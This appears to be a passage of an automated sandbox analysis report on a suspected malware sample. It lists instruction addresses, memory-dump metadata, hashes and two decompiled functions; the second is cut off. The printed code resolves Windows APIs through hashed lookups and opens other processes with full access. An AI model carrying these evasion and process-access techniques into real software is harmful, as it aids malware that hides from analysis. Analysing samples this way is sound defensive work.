0x6ecf173f
0x6ecf1742
0x6ecf1746
0x6ecf174a
0x6ecf1751
0x6ecf1763
0x6ecf1779
0x6ecf1784
0x6ecf1785
0x6ecf1786
0x6ecf1787
0x6ecf1788
0x6ecf178b
0x6ecf178f
0x6ecf1793
0x6ecf179a
0x6ecf17ac
0x6ecf17c2
0x6ecf17cd
0x6ecf17ce
0x6ecf17cf
0x6ecf17d0
0x6ecf17d1
0x6ecf17d4
0x6ecf17d8
0x6ecf17dc
0x6ecf17e3
0x6ecf17f5
0x6ecf180b
0x6ecf1816
0x6ecf1817
0x6ecf1818
0x6ecf1819
0x6ecf181a
0x6ecf181d
0x6ecf1821
0x6ecf1825
0x6ecf182c
0x6ecf183e
0x6ecf1854
0x6ecf185f
0x6ecf1860
0x6ecf1861
0x6ecf1862
0x6ecf1863
0x6ecf1866
0x6ecf186a
0x6ecf186e
0x6ecf1875
0x6ecf1887
0x6ecf189d
0x6ecf18a8
0x6ecf18a9
0x6ecf18aa
0x6ecf18ab
0x6ecf18ac
0x6ecf18af
0x6ecf18b3
0x6ecf18b7
0x6ecf18be
0x6ecf18d0
0x6ecf18e6
0x6ecf18f1
0x6ecf18f2
0x6ecf18f3
0x6ecf18f4
0x6ecf18f5
0x6ecf18f8
0x6ecf18fc
0x6ecf1900
0x6ecf1907
0x6ecf1919
0x6ecf192f
0x6ecf193a
0x6ecf193b
0x6ecf193c
0x6ecf193d
0x6ecf193e
0x6ecf1941
0x6ecf1945
0x6ecf1949
0x6ecf1950
0x6ecf1962
0x6ecf1978
0x6ecf1983
0x6ecf1984
0x6ecf1985
0x6ecf1986
0x6ecf198c
0x6ecf198f
0x6ecf1991
0x6ecf199c
0x6ecf19a3
0x6ecf19ac
0x6ecf19b4
0x6ecf19bb
0x6ecf19c4
0x6ecf19cc
0x6ecf19d3
0x6ecf19dc
0x6ecf19e4
0x6ecf19eb
0x6ecf19f4
0x6ecf19fc
0x6ecf1a03
0x6ecf1a0c
0x6ecf1a14
0x6ecf1a1b
0x6ecf1a24
0x6ecf1a2c
0x6ecf1a36
0x6ecf1a3f
0x6ecf1a47
0x6ecf1a51
0x6ecf1a5a
0x6ecf1a62
0x6ecf1a6c
0x6ecf1a75
0x6ecf1a7d
0x6ecf1a87
0x6ecf1a90
0x6ecf1a98
0x6ecf1aa2
0x6ecf1aab
0x6ecf1ab3
0x6ecf1abd
0x6ecf1ac6
0x6ecf1ace
0x6ecf1ad8
0x6ecf1ae1
0x6ecf1ae9
0x6ecf1af3
0x6ecf1afc
0x6ecf1b04
0x6ecf1b0e
0x6ecf1b17
0x6ecf1b1f
0x6ecf1b26
0x6ecf1b2f
0x6ecf1b37
0x6ecf1b3e
0x6ecf1b43
0x6ecf1b51
0x6ecf1b55
0x6ecf1b64
0x6ecf1b6d
0x6ecf1b72
0x6ecf1b79
0x6ecf1b7d
0x6ecf1b81
0x6ecf1b88
0x6ecf1b9a
0x6ecf1bb0
0x6ecf1bbb
0x6ecf1bbc
0x6ecf1bbd
0x6ecf1bbe
0x6ecf1bbf
0x6ecf1bc2
0x6ecf1bc6
0x6ecf1bca
0x6ecf1bd1
0x6ecf1be3
0x6ecf1bf9
0x6ecf1c04
0x6ecf1c05
0x6ecf1c06
0x6ecf1c07
0x6ecf1c08
0x6ecf1c0b
0x6ecf1c0f
0x6ecf1c13
0x6ecf1c1a
0x6ecf1c2c
0x6ecf1c42
0x6ecf1c4d
0x6ecf1c4e
0x6ecf1c4f
0x6ecf1c50
0x6ecf1c51
0x6ecf1c54
0x6ecf1c58
0x6ecf1c5c
0x6ecf1c63
0x6ecf1c75
0x6ecf1c8b
0x6ecf1c96
0x6ecf1c97
0x6ecf1c98
0x6ecf1c99
0x6ecf1c9a
0x6ecf1c9d
0x6ecf1ca0
0x6ecf1ca1
0x6ecf1ca2
0x6ecf1ca9
0x6ecf1cac
0x6ecf1cb7
0x6ecf1cbe
0x6ecf1cc7
0x6ecf1ccf
0x6ecf1cd6
0x6ecf1cdf
0x6ecf1ce7
0x6ecf1cee
0x6ecf1cf7
0x6ecf1cff
0x6ecf1d04
0x6ecf1d0d
0x6ecf1d15
0x6ecf1d2a

Strings

8nsK, xrefs: 6ECF1900

Memory Dump Source

Source File: 00000001.00000002.693021141.000000006ECF1000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: true

Associated: 00000001.00000002.692999232.000000006ECF0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693073073.000000006ED0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693089731.000000006ED0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.693101054.000000006ED0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 8nsK
API String ID: 0-3012451157
Opcode ID: 60b1e94d03bf4eca53a3807416a63dd6bf793c8da0414a784cc05012ea9fc06e
Instruction ID: 7611861feeb7eb29a0ee9cbedaa092176a09d2aa02af51c141ba35ccc19c9200
Opcode Fuzzy Hash: 60b1e94d03bf4eca53a3807416a63dd6bf793c8da0414a784cc05012ea9fc06e
Instruction Fuzzy Hash: A0327372414746DECB15DF60CC509EF7BA4EFA1208F204F1DB9895A1A2FF71A98BC681

Uniqueness

Uniqueness Score: -1.00%

Function 6ECFA4E8, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E6ECFA4E8(signed int* __ecx, void* __eflags) {
				void* __esi;
				void* __ebp;
				void* _t182;
				signed int _t183;
				signed int* _t188;
				void* _t198;
				void* _t199;
				void* _t228;
				void* _t229;
				void* _t242;
				void* _t243;
				void* _t251;
				signed int* _t271;
				void* _t282;
				void* _t284;
				void* _t285;
				void* _t296;
				signed int* _t308;
				void* _t324;
				signed int _t398;
				signed int _t402;
				intOrPtr* _t403;
				intOrPtr* _t404;
				signed int _t406;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				void* _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t419;
				void* _t420;
				signed int _t421;
				void* _t422;
				signed int _t424;
				signed int _t429;
				signed int _t433;
				signed int _t434;
				signed int _t437;
				intOrPtr* _t439;

				_t308 = __ecx;
				 *(_t439 + 0x78) = 0;
				 *_t439 = __ecx + 8;
				 *((intOrPtr*)(_t439 + 4)) = __ecx + 0x20;
				while(1) {
					_t392 =  *_t308;
					E6ECFB658(_t439 + 0x24, _t392, 0x7fffffff);
					if(E6ECFF4D0(_t439 + 0x24) == 0) {
						goto L3;
					} else {
						_t308[0xc] = 0;
						E6ECFF654(_t439 + 0x24);
					}
					L63:
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					L65:
					if((_t407 | _t398) != 0) {
						L68:
						return _t407;
					}
					if( *(_t439 + 0x78) != 0x20) {
						E6ED02234(0x5dc, _t392, _t407);
						 *(_t439 + 0x78) =  *(_t439 + 0x78) + 1;
						continue;
					}
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					goto L68;
					L3:
					__eflags = _t308[1];
					if(_t308[1] <= 0) {
						L21:
						__eflags =  *(_t439 + 0x20);
						if( *(_t439 + 0x20) <= 0) {
							L33:
							E6ECFF654(_t439 + 0x24);
							__eflags = _t308[0xc];
							if(_t308[0xc] == 0) {
								L46:
								 *((intOrPtr*)(_t439 + 8)) = 0;
								 *((intOrPtr*)(_t439 + 0xc)) = 0;
								E6ECFF584(_t439 + 0x14, 0);
								 *((intOrPtr*)(_t439 + 0x38)) = 0;
								 *(_t439 + 0x34) =  *_t308;
								E6ECFF584(_t439 + 0x40, 0);
								_t182 = 0x40;
								__eflags = _t308[7] - 0x40;
								_t183 =  <  ? _t308[7] : _t182;
								 *(_t439 + 0x74) = _t183;
								__eflags = _t183;
								if(_t183 <= 0) {
									L57:
									asm("movq xmm0, [0x6ed0b808]");
									asm("movq [esp+0x84], xmm0");
									_t406 = E6ED03064(0x60a28c5c, 0x14e85b34);
									__eflags = _t406;
									if(_t406 == 0) {
										_t424 = 0;
										__eflags = 0;
										L61:
										__eflags = _t424 - 0x3f;
										if(_t424 <= 0x3f) {
											__eflags = _t424 << 2;
											_t308[0xc] =  *(E6ECFF4BC( *((intOrPtr*)(_t439 + 8)), _t424 << 2));
											_t188 = E6ECFF4BC( *((intOrPtr*)(_t439 + 4)), _t424 << 2);
											_t407 = _t308[0xc];
											asm("cdq");
											_t308[0xd] =  *_t188;
											_t398 = _t392;
											E6ECFB5C4(_t439 + 0x34);
											E6ECFB5C4(_t439 + 8);
											goto L65;
										}
										L62:
										E6ECFB5C4(_t439 + 0x34);
										E6ECFB5C4(_t439 + 8);
										goto L63;
									}
									_t392 = E6ECFF4BC(_t439 + 0x14, 0);
									_t198 =  *_t406( *((intOrPtr*)(_t439 + 0xc)), _t392, 1, 0, _t439 + 0x84);
									_t133 = _t198 - 0x80; // -128
									_t199 = _t133;
									__eflags = _t199 - 0x3f;
									_t424 =  <=  ? _t199 : _t198;
									__eflags = _t424 - 0x102;
									if(_t424 == 0x102) {
										goto L62;
									}
									goto L61;
								}
								_t437 = 0;
								__eflags = 0;
								while(1) {
									E6ECFCA8C(_t439 + 0x4c);
									_t392 = 0;
									_t324 = _t439 + 0x4c;
									 *((char*)(_t324 + 4)) = 0;
									 *((intOrPtr*)(_t324 + 0x1c)) = 0;
									__eflags = E6ECFC280(_t324);
									if(__eflags != 0) {
										break;
									}
									E6ECFF828(_t439 + 0x14, E6ECFF4CC(_t439 + 0x10) + 4);
									 *((intOrPtr*)(E6ECFF4BC(_t439 + 0x14, E6ECFF4CC(_t439 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t439 + 0x4c));
									 *((intOrPtr*)(_t439 + 0xc)) =  *((intOrPtr*)(_t439 + 0xc)) + 1;
									_t409 = E6ED03064(0x60a28c5c, 0x3659ae1e);
									__eflags = _t409;
									if(_t409 == 0) {
										L51:
										_t392 =  *(_t439 + 0x68);
										__eflags = _t392;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t392 - 0xffffffff;
										if(__eflags != 0) {
											E6ECFF828(_t439 + 0x40, E6ECFF4CC(_t439 + 0x3c) + 4);
											 *(E6ECFF4BC(_t439 + 0x40, E6ECFF4CC(_t439 + 0x3c) + 0xfffffffc)) =  *(_t439 + 0x68);
											 *((intOrPtr*)(_t439 + 0x4c - 0x14)) =  *((intOrPtr*)(_t439 + 0x4c - 0x14)) + 1;
											E6ECFCD24(_t439 + 0x4c, __eflags);
											_t437 = _t437 + 1;
											__eflags = _t437 -  *(_t439 + 0x74);
											if(_t437 <  *(_t439 + 0x74)) {
												continue;
											}
											_t411 = 0;
											__eflags = 0;
											do {
												E6ECFF4BC( *((intOrPtr*)(_t439 + 8)), _t411 * 4);
												E6ECFF4BC(_t439 + 0x40, _t411 * 4);
												_t439 = _t439 + 0xffffffd8;
												asm("cdq");
												asm("pxor xmm5, xmm5");
												asm("movd xmm1, dword [ebp]");
												asm("movd xmm4, dword [edi]");
												asm("movd xmm0, edx");
												asm("cdq");
												asm("punpckldq xmm1, xmm0");
												asm("movq xmm2, [ebx+0x38]");
												asm("movq [esp], xmm1");
												asm("movd xmm3, edx");
												asm("punpckldq xmm4, xmm3");
												asm("movq [esp+0x8], xmm2");
												asm("movq [esp+0x10], xmm4");
												asm("movq [esp+0x18], xmm5");
												asm("movq [esp+0x20], xmm5");
												E6ECFAC48(__eflags);
												_t411 = _t411 + 1;
												__eflags = _t411 -  *(_t439 + 0x74);
											} while (_t411 <  *(_t439 + 0x74));
											goto L57;
										}
										break;
									}
									_t392 = _t439 + 0x68;
									 *_t409(0xffffffff,  *((intOrPtr*)(_t439 + 0x60)),  *_t308, _t439 + 0x68, 0, 0, 2);
									__eflags = 0;
									if(0 != 0) {
										break;
									}
									goto L51;
								}
								E6ECFCD24(_t439 + 0x4c, __eflags);
								goto L62;
							}
							_t402 = _t308[1];
							__eflags = _t402;
							if(_t402 <= 0) {
								goto L46;
							}
							_t412 = 0;
							__eflags = 0;
							while(1) {
								_t429 = _t412 * 4;
								_t392 =  *(E6ECFF4BC( *((intOrPtr*)(_t439 + 4)), _t429));
								__eflags = _t392 - _t308[0xd];
								if(_t392 == _t308[0xd]) {
									break;
								}
								_t412 = _t412 + 1;
								__eflags = _t412 - _t402;
								if(_t412 < _t402) {
									continue;
								}
								goto L46;
							}
							__eflags = _t412 - 0xffffffff;
							if(_t412 != 0xffffffff) {
								_t228 = E6ECFF4CC( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t228 - _t429;
								if(_t228 > _t429) {
									_t392 = 4 + _t412 * 4;
									 *(_t439 + 0x6c) = _t392;
									_t251 = E6ECFF4CC( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t251 -  *(_t439 + 0x6c);
									if(_t251 >  *(_t439 + 0x6c)) {
										 *((intOrPtr*)(_t439 + 0x90)) = E6ECFF4BC( *((intOrPtr*)(_t439 + 8)), _t429);
										 *((intOrPtr*)(_t439 + 0x8c)) = E6ECFF4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x6c));
										E6ED038F0( *((intOrPtr*)(_t439 + 0x98)),  *((intOrPtr*)(_t439 + 0x90)), E6ECFF4CC( *((intOrPtr*)(_t439 + 4))) -  *(_t439 + 0x6c));
										_t439 = _t439 + 0xc;
									}
									E6ECFF828( *((intOrPtr*)(_t439 + 8)), E6ECFF4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t74 =  &(_t308[7]);
									 *_t74 = _t308[7] - 1;
									__eflags =  *_t74;
								}
								_t229 = E6ECFF4CC( *_t439);
								__eflags = _t229 - _t429;
								if(_t229 > _t429) {
									_t413 = 4 + _t412 * 4;
									_t242 = E6ECFF4CC( *_t439);
									__eflags = _t242 - _t413;
									if(_t242 > _t413) {
										_t243 = E6ECFF4BC( *((intOrPtr*)(_t439 + 4)), _t429);
										 *((intOrPtr*)(_t439 + 0x94)) = E6ECFF4BC( *((intOrPtr*)(_t439 + 4)), _t413);
										E6ED038F0(_t243,  *((intOrPtr*)(_t439 + 0x98)), E6ECFF4CC( *_t439) - _t413);
										_t439 = _t439 + 0xc;
									}
									E6ECFF828( *((intOrPtr*)(_t439 + 4)), E6ECFF4CC( *_t439) + 0xfffffffc);
									_t79 =  &(_t308[1]);
									 *_t79 = _t308[1] - 1;
									__eflags =  *_t79;
								}
								E6ECFF828( *((intOrPtr*)(_t439 + 8)), E6ECFF4CC( *((intOrPtr*)(_t439 + 4))) + 4);
								 *(E6ECFF4BC( *((intOrPtr*)(_t439 + 8)), E6ECFF4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t308[0xc];
								_t308[7] = _t308[7] + 1;
								E6ECFF828( *((intOrPtr*)(_t439 + 4)), E6ECFF4CC( *_t439) + 4);
								 *(E6ECFF4BC( *((intOrPtr*)(_t439 + 4)), E6ECFF4CC( *_t439) + 0xfffffffc)) = _t308[0xd];
								_t308[1] = _t308[1] + 1;
							}
							goto L46;
						}
						_t433 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x70) = _t433 * 4;
							_t403 = E6ECFF4BC(_t439 + 0x28, _t433 * 4);
							_t392 = _t308[1];
							 *(_t439 + 0x80) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L29:
								_t414 = E6ED03064(0x8e844d1e, 0x5c3654e3);
								__eflags = _t414;
								if(_t414 != 0) {
									_t416 =  *_t414(0x1fffff, 0,  *((intOrPtr*)(E6ECFF4BC(_t439 + 0x28,  *(_t439 + 0x70)))));
									__eflags = _t416;
									if(_t416 != 0) {
										E6ECFF828( *((intOrPtr*)(_t439 + 8)), E6ECFF4CC( *((intOrPtr*)(_t439 + 4))) + 4);
										 *(E6ECFF4BC( *((intOrPtr*)(_t439 + 8)), E6ECFF4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t416;
										_t308[7] = _t308[7] + 1;
										_t271 = E6ECFF4BC(_t439 + 0x28,  *(_t439 + 0x70));
										E6ECFF828( *((intOrPtr*)(_t439 + 4)), E6ECFF4CC( *_t439) + 4);
										 *(E6ECFF4BC( *((intOrPtr*)(_t439 + 4)), E6ECFF4CC( *_t439) + 0xfffffffc)) =  *_t271;
										_t57 =  &(_t308[1]);
										 *_t57 = _t308[1] + 1;
										__eflags =  *_t57;
									}
								}
								goto L32;
							}
							_t415 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6ECFF4BC( *((intOrPtr*)(_t439 + 4)), _t415 * 4));
								__eflags = _t392 -  *_t403;
								if(_t392 ==  *_t403) {
									break;
								}
								_t415 = _t415 + 1;
								__eflags = _t415 -  *(_t439 + 0x80);
								if(_t415 <  *(_t439 + 0x80)) {
									continue;
								}
								goto L29;
							}
							__eflags = _t415 - 0xffffffff;
							if(_t415 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t433 = _t433 + 1;
							__eflags = _t433 -  *(_t439 + 0x20);
						} while (_t433 <  *(_t439 + 0x20));
						goto L33;
					} else {
						_t434 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x64) = _t434 * 4;
							_t404 = E6ECFF4BC( *((intOrPtr*)(_t439 + 4)), _t434 * 4);
							_t392 =  *(_t439 + 0x20);
							 *(_t439 + 0x7c) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L11:
								_t282 = E6ECFF4CC( *_t439);
								__eflags = _t282 -  *(_t439 + 0x64);
								if(_t282 >  *(_t439 + 0x64)) {
									_t420 = 4 + _t434 * 4;
									_t296 = E6ECFF4CC( *_t439);
									__eflags = _t296 - _t420;
									if(_t296 > _t420) {
										 *((intOrPtr*)(_t439 + 0x9c)) = E6ECFF4BC( *((intOrPtr*)(_t439 + 4)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0x98)) = E6ECFF4BC( *((intOrPtr*)(_t439 + 4)), _t420);
										E6ED038F0( *((intOrPtr*)(_t439 + 0xa4)),  *((intOrPtr*)(_t439 + 0x9c)), E6ECFF4CC( *_t439) - _t420);
										_t439 = _t439 + 0xc;
									}
									E6ECFF828( *((intOrPtr*)(_t439 + 4)), E6ECFF4CC( *_t439) + 0xfffffffc);
									_t22 =  &(_t308[1]);
									 *_t22 = _t308[1] - 1;
									__eflags =  *_t22;
								}
								_t419 = E6ED03064(0x60a28c5c, 0xe96b154c);
								__eflags = _t419;
								if(_t419 != 0) {
									 *_t419( *((intOrPtr*)(E6ECFF4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64)))));
								}
								_t284 = E6ECFF4CC( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t284 -  *(_t439 + 0x64);
								if(_t284 >  *(_t439 + 0x64)) {
									_t422 = 4 + _t434 * 4;
									_t285 = E6ECFF4CC( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t285 - _t422;
									if(_t285 > _t422) {
										 *((intOrPtr*)(_t439 + 0xa4)) = E6ECFF4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0xa0)) = E6ECFF4BC( *((intOrPtr*)(_t439 + 8)), _t422);
										E6ED038F0( *((intOrPtr*)(_t439 + 0xac)),  *((intOrPtr*)(_t439 + 0xa4)), E6ECFF4CC( *((intOrPtr*)(_t439 + 4))) - _t422);
										_t439 = _t439 + 0xc;
									}
									E6ECFF828( *((intOrPtr*)(_t439 + 8)), E6ECFF4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t33 =  &(_t308[7]);
									 *_t33 = _t308[7] - 1;
									__eflags =  *_t33;
								}
								_t434 = _t434 - 1;
								__eflags = _t434;
								goto L20;
							}
							_t421 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6ECFF4BC(_t439 + 0x28, _t421 * 4));
								__eflags = _t392 -  *_t404;
								if(_t392 ==  *_t404) {
									break;
								}
								_t421 = _t421 + 1;
								__eflags = _t421 -  *(_t439 + 0x7c);
								if(_t421 <  *(_t439 + 0x7c)) {
									continue;
								}
								goto L11;
							}
							__eflags = _t421 - 0xffffffff;
							if(_t421 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t434 = _t434 + 1;
							__eflags = _t434 - _t308[1];
						} while (_t434 < _t308[1]);
						goto L21;
					}
				}
			}

0x6ecfa4f2
0x6ecfa4f4
0x6ecfa4ff
0x6ecfa505
0x6ecfa509
0x6ecfa50e
0x6ecfa514
0x6ecfa524
0x00000000
0x6ecfa526
0x6ecfa526
0x6ecfa531
0x6ecfa531
0x6ecfaaaf
0x6ecfaab1
0x6ecfaab2
0x6ecfaaf1
0x6ecfaaf5
0x6ecfab03
0x6ecfab11
0x6ecfab11
0x6ecfaafc
0x6ecfab17
0x6ecfab1c
0x00000000
0x6ecfab1c
0x6ecfab00
0x6ecfab01
0x00000000
0x6ecfa53b
0x6ecfa53b
0x6ecfa53f
0x6ecfa646
0x6ecfa646
0x6ecfa64b
0x6ecfa75c
0x6ecfa760
0x6ecfa765
0x6ecfa769
0x6ecfa893
0x6ecfa895
0x6ecfa899
0x6ecfa8a2
0x6ecfa8ab
0x6ecfa8af
0x6ecfa8b8
0x6ecfa8bf
0x6ecfa8c0
0x6ecfa8c4
0x6ecfa8c8
0x6ecfa8cc
0x6ecfa8ce
0x6ecfaa38
0x6ecfaa38
0x6ecfaa40
0x6ecfaa58
0x6ecfaa5a
0x6ecfaa5c
0x6ecfaa96
0x6ecfaa96
0x6ecfaa98
0x6ecfaa98
0x6ecfaa9b
0x6ecfaab6
0x6ecfaaca
0x6ecfaacd
0x6ecfaad2
0x6ecfaadd
0x6ecfaade
0x6ecfaae1
0x6ecfaae3
0x6ecfaaec
0x00000000
0x6ecfaaec
0x6ecfaa9d
0x6ecfaaa1
0x6ecfaaaa
0x00000000
0x6ecfaaaa
0x6ecfaa6d
0x6ecfaa7d
0x6ecfaa81
0x6ecfaa81
0x6ecfaa84
0x6ecfaa87
0x6ecfaa8a
0x6ecfaa90
0x00000000
0x00000000
0x00000000
0x6ecfaa92
0x6ecfa8d6
0x6ecfa8d6
0x6ecfa8d8
0x6ecfa8dc
0x6ecfa8e1
0x6ecfa8e3
0x6ecfa8e7
0x6ecfa8ea
0x6ecfa8f2
0x6ecfa8f4
0x00000000
0x00000000
0x6ecfa90b
0x6ecfa926
0x6ecfa928
0x6ecfa93b
0x6ecfa93d
0x6ecfa93f
0x6ecfa95a
0x6ecfa95a
0x6ecfa95e
0x6ecfa960
0x00000000
0x00000000
0x6ecfa962
0x6ecfa965
0x6ecfa986
0x6ecfa9a5
0x6ecfa9ab
0x6ecfa9ae
0x6ecfa9b3
0x6ecfa9b4
0x6ecfa9b8
0x00000000
0x00000000
0x6ecfa9c0
0x6ecfa9c0
0x6ecfa9c2
0x6ecfa9ce
0x6ecfa9da
0x6ecfa9e4
0x6ecfa9e7
0x6ecfa9ea
0x6ecfa9ee
0x6ecfa9f5
0x6ecfa9f9
0x6ecfa9fd
0x6ecfa9fe
0x6ecfaa02
0x6ecfaa07
0x6ecfaa0c
0x6ecfaa10
0x6ecfaa14
0x6ecfaa1a
0x6ecfaa20
0x6ecfaa26
0x6ecfaa2c
0x6ecfaa31
0x6ecfaa32
0x6ecfaa32
0x00000000
0x6ecfa9c2
0x00000000
0x6ecfa965
0x6ecfa943
0x6ecfa954
0x6ecfa956
0x6ecfa958
0x00000000
0x00000000
0x00000000
0x6ecfa958
0x6ecfa96b
0x00000000
0x6ecfa96b
0x6ecfa76f
0x6ecfa772
0x6ecfa774
0x00000000
0x00000000
0x6ecfa77c
0x6ecfa77c
0x6ecfa77e
0x6ecfa77e
0x6ecfa78f
0x6ecfa791
0x6ecfa794
0x00000000
0x00000000
0x6ecfa88a
0x6ecfa88b
0x6ecfa88d
0x00000000
0x00000000
0x00000000
0x6ecfa88d
0x6ecfa79a
0x6ecfa79d
0x6ecfa7a7
0x6ecfa7ac
0x6ecfa7ae
0x6ecfa7b4
0x6ecfa7bb
0x6ecfa7bf
0x6ecfa7c4
0x6ecfa7c8
0x6ecfac03
0x6ecfac17
0x6ecfac3a
0x6ecfac3f
0x6ecfac3f
0x6ecfa7df
0x6ecfa7e4
0x6ecfa7e4
0x6ecfa7e4
0x6ecfa7e4
0x6ecfa7ea
0x6ecfa7ef
0x6ecfa7f1
0x6ecfa7f6
0x6ecfa7fd
0x6ecfa802
0x6ecfa804
0x6ecfabc1
0x6ecfabd2
0x6ecfabec
0x6ecfabf1
0x6ecfabf1
0x6ecfa81a
0x6ecfa81f
0x6ecfa81f
0x6ecfa81f
0x6ecfa81f
0x6ecfa833
0x6ecfa851
0x6ecfa856
0x6ecfa866
0x6ecfa883
0x6ecfa885
0x6ecfa885
0x00000000
0x6ecfa79d
0x6ecfa653
0x6ecfa653
0x6ecfa655
0x6ecfa65c
0x6ecfa66a
0x6ecfa66c
0x6ecfa66f
0x6ecfa676
0x6ecfa678
0x6ecfa6a9
0x6ecfa6b8
0x6ecfa6ba
0x6ecfa6bc
0x6ecfa6da
0x6ecfa6dc
0x6ecfa6de
0x6ecfa6f1
0x6ecfa710
0x6ecfa716
0x6ecfa719
0x6ecfa730
0x6ecfa74c
0x6ecfa74e
0x6ecfa74e
0x6ecfa74e
0x6ecfa74e
0x6ecfa6de
0x00000000
0x6ecfa6bc
0x6ecfa67c
0x6ecfa67c
0x6ecfa67e
0x6ecfa68f
0x6ecfa691
0x6ecfa693
0x00000000
0x00000000
0x6ecfa69f
0x6ecfa6a0
0x6ecfa6a7
0x00000000
0x00000000
0x00000000
0x6ecfa6a7
0x6ecfa695
0x6ecfa698
0x00000000
0x00000000
0x6ecfa751
0x6ecfa751
0x6ecfa752
0x6ecfa752
0x00000000
0x6ecfa545
0x6ecfa547
0x6ecfa547
0x6ecfa549
0x6ecfa550
0x6ecfa55e
0x6ecfa560
0x6ecfa564
0x6ecfa568
0x6ecfa56a
0x6ecfa598
0x6ecfa59b
0x6ecfa5a0
0x6ecfa5a4
0x6ecfa5a9
0x6ecfa5b0
0x6ecfa5b5
0x6ecfa5b7
0x6ecfab7e
0x6ecfab8f
0x6ecfabaf
0x6ecfabb4
0x6ecfabb4
0x6ecfa5cd
0x6ecfa5d2
0x6ecfa5d2
0x6ecfa5d2
0x6ecfa5d2
0x6ecfa5e4
0x6ecfa5e6
0x6ecfa5e8
0x6ecfa5f9
0x6ecfa5f9
0x6ecfa5ff
0x6ecfa604
0x6ecfa608
0x6ecfa60e
0x6ecfa615
0x6ecfa61a
0x6ecfa61c
0x6ecfab32
0x6ecfab43
0x6ecfab64
0x6ecfab69
0x6ecfab69
0x6ecfa633
0x6ecfa638
0x6ecfa638
0x6ecfa638
0x6ecfa638
0x6ecfa63b
0x6ecfa63b
0x00000000
0x6ecfa63b
0x6ecfa56e
0x6ecfa56e
0x6ecfa570
0x6ecfa581
0x6ecfa583
0x6ecfa585
0x00000000
0x00000000
0x6ecfa591
0x6ecfa592
0x6ecfa596
0x00000000
0x00000000
0x00000000
0x6ecfa596
0x6ecfa587
0x6ecfa58a
0x00000000
0x00000000
0x6ecfa63c
0x6ecfa63c
0x6ecfa63d
0x6ecfa63d
0x00000000
0x6ecfa549
0x6ecfa53f

Strings

, xrefs: 6ECFAAF7

Memory Dump Source

Source File: 00000001.00000002.693021141.000000006ECF1000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: true

Associated: 00000001.00000002.692999232.000000006ECF0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693073073.000000006ED0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693089731.000000006ED0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.693101054.000000006ED0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 8faebb66eeb5f659b5bd40e5e6887dbabb277e746b4b7ef18458c76f448ee424
Instruction ID: 636129e1a971c77611bd703cf16102d59a9c286c489cc5eddbda2a2454cf39c9
Opcode Fuzzy Hash: 8faebb66eeb5f659b5bd40e5e6887dbabb277e746b4b7ef18458c76f448ee424
Instruction Fuzzy Hash: 43127272508341DFC794DFA4C890AAEB7A9EFC5704F104E2DE999972A5FB309D02CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6ECF8428, Relevance: 1.8, Strings: 1, Instructions: 531
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E6ECF8428(signed int* __ecx, intOrPtr __edx, void* __eflags) {
				void* __esi;
				void* __ebp;
				signed int* _t173;
				signed int* _t178;
				void* _t180;
				void* _t181;
				intOrPtr* _t188;
				signed int _t202;
				intOrPtr* _t211;
				intOrPtr* _t212;
				intOrPtr* _t217;
				signed int* _t218;
				void* _t219;
				void* _t220;
				void* _t237;
				void* _t238;
				signed int* _t246;
				void* _t247;
				signed int* _t258;
				intOrPtr* _t269;
				signed int* _t277;
				intOrPtr* _t279;
				void* _t283;
				void* _t285;
				void* _t287;
				signed int* _t296;
				void* _t299;
				signed int* _t308;
				intOrPtr* _t310;
				signed int _t315;
				intOrPtr _t317;
				signed int* _t322;
				signed int _t323;
				signed int _t324;
				void* _t343;
				void* _t414;
				signed int _t415;
				signed int* _t421;
				signed int _t427;
				intOrPtr* _t428;
				intOrPtr* _t429;
				signed int _t431;
				signed int _t433;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t442;
				void* _t443;
				signed int _t444;
				void* _t445;
				signed int _t446;
				intOrPtr* _t449;

				 *_t449 = __ecx + 0x1c;
				 *((intOrPtr*)(_t449 + 0x68)) = __edx;
				 *(_t449 + 4) = __ecx;
				 *(_t449 + 0x84) = 0;
				 *((intOrPtr*)(_t449 + 0x78)) = __ecx + 4;
				while(1) {
					_t413 =  *(_t449 + 0x6c);
